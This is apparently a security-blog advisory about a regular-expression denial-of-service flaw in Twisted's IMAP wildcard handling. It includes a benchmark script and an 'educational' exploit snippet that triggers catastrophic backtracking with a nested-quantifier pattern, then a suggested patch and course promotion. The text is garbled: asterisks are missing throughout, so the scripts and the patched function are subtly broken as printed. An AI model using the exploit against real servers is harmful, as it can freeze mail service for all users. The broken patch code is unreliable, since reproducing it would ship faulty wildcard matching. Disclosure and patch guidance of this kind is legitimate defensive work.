Listen to this Post
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the `wildcardToRegexp()` function within `twisted/mail/imap4.py` in Twisted framework version 25.5.0 and earlier. The function is designed to translate standard IMAP wildcards (“ and %) into equivalent non-capturing regular expression patterns. However, it fails to sanitize or escape other characters supplied in user input, passing unescaped metacharacters directly to re.compile(). Consequently, an authenticated remote attacker can send malicious IMAP `LIST` or `LSUB` patterns containing complex regular expression syntax like nested quantifiers (e.g., (a+)+z). When processed against a candidate mailbox target, the Python regex engine undergoes exponential (catastrophic) backtracking. Because Twisted operates on a cooperative, single-threaded event loop reactor, a single blocking regex evaluation freezes all input and output operations across the entire server, leading to a total Denial of Service for all connected clients until the pattern matching completes or time limit expires.
DailyCVE Form:
Platform: Twisted IMAP Server
Version: 25.5.0 and earlier
Vulnerability: Regular Expression DoS
Severity: Medium
date: October 06 2026
Prediction: November 2026
What Undercode Say: Analytics
An analysis of the vulnerability flow highlights how user input passed directly to `re.compile()` converts simple wildcard searches into blocking engine calls.
Verify Twisted IMAP installation version
python3 -c "import twisted; print(twisted.<strong>version</strong>)"
Benchmark regex execution times with increasing payload lengths
python3 -c '
from twisted.mail.imap4 import wildcardToRegexp
import time
rx = wildcardToRegexp("(a+)+z", "/")
for n in [20, 22, 24, 26, 28]:
victim = "a" n
t0 = time.perf_counter()
rx.match(victim)
print(f"n={n}: {time.perf_counter() - t0:.3f}s")
'
Exploit: (Educational Purposes!)
import time
from twisted.mail.imap4 import wildcardToRegexp
Craft a regular expression triggering catastrophic backtracking
vulnerable_pattern = "(a+)+z"
delimiter = "/"
Function compiles unescaped metacharacters directly
rx = wildcardToRegexp(vulnerable_pattern, delimiter)
Test input string triggering ReDoS against single-threaded reactor
payload_length = 28
test_string = "a" payload_length
print(f"[] Sending payload of size {payload_length}...")
start_time = time.perf_counter()
rx.match(test_string)
print(f"[] Match evaluation completed in {time.perf_counter() - start_time:.3f} seconds.")
Protection:
Modify `wildcardToRegexp()` in `twisted/mail/imap4.py` to escape all non-wildcard characters using `re.escape()` before regex compilation:
import re
def wildcardToRegexp(wildcard, delim=None):
parts = re.split(r'([%])', wildcard)
result = []
for p in parts:
if p == '':
result.append('(?:.?)')
elif p == '%':
if delim is None:
result.append('(?:.?)')
else:
result.append('(?:(?:[^%s])?)' % re.escape(delim))
else:
result.append(re.escape(p))
return re.compile(''.join(result), re.I)
Impact:
An authenticated user can cause complete engine denial of service by sending a small payload, stalling server IO processing and freezing all active connection threads across the Twisted event reactor loop.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

